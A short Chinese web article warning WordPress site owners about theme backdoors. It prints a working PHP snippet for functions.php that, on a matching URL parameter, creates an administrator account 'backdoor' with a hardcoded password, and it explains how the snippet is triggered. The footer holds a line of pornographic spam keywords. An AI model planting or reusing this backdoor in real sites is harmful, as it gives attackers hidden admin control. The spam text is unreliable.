防范wordpress主題加后門(mén)代碼獲取管理員權(quán)限

來(lái)源：本站原創(chuàng)|時(shí)間：2020-01-11|欄目：WordPress|點(diǎn)擊：次

復(fù)制代碼

代碼如下:

add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

簡(jiǎn)單說(shuō)明下，代碼主要放于functions.php文件里面，不會(huì)影響任何功能使用，如果存在此代碼，任何人只要運(yùn)行http://www.你的域名.com/?backdoor=go，然后就創(chuàng)建了一個(gè)用戶名為“backdoor”，密碼為：“pa55w0rd!” 的管理員。同樣具備管理員的權(quán)限，很編輯主題代碼文件，相信此時(shí)你一定感覺(jué)到很危險(xiǎn)了吧，趕緊檢查檢查自己的主題代碼吧……

上一篇：wordpress無(wú)法登錄后臺(tái)的解決方案

欄目：WordPress

下一篇：wordpress全局變量$wpdb初始化并聲明為全局變量的方法

本文標(biāo)題：防范wordpress主題加后門(mén)代碼獲取管理員權(quán)限

本文地址：http://mengdiqiu.com.cn/a1/WordPress/12808.html

更多WordPress

欧美大屁股bbbbxxxx,狼人大香伊蕉国产www亚洲,男ji大巴进入女人的视频小说,男人把ji大巴放进女人免费视频,免费情侣作爱视频

WordPress

防范wordpress主題加后門(mén)代碼獲取管理員權(quán)限

您可能感興趣的文章

閱讀排行

本欄相關(guān)

隨機(jī)閱讀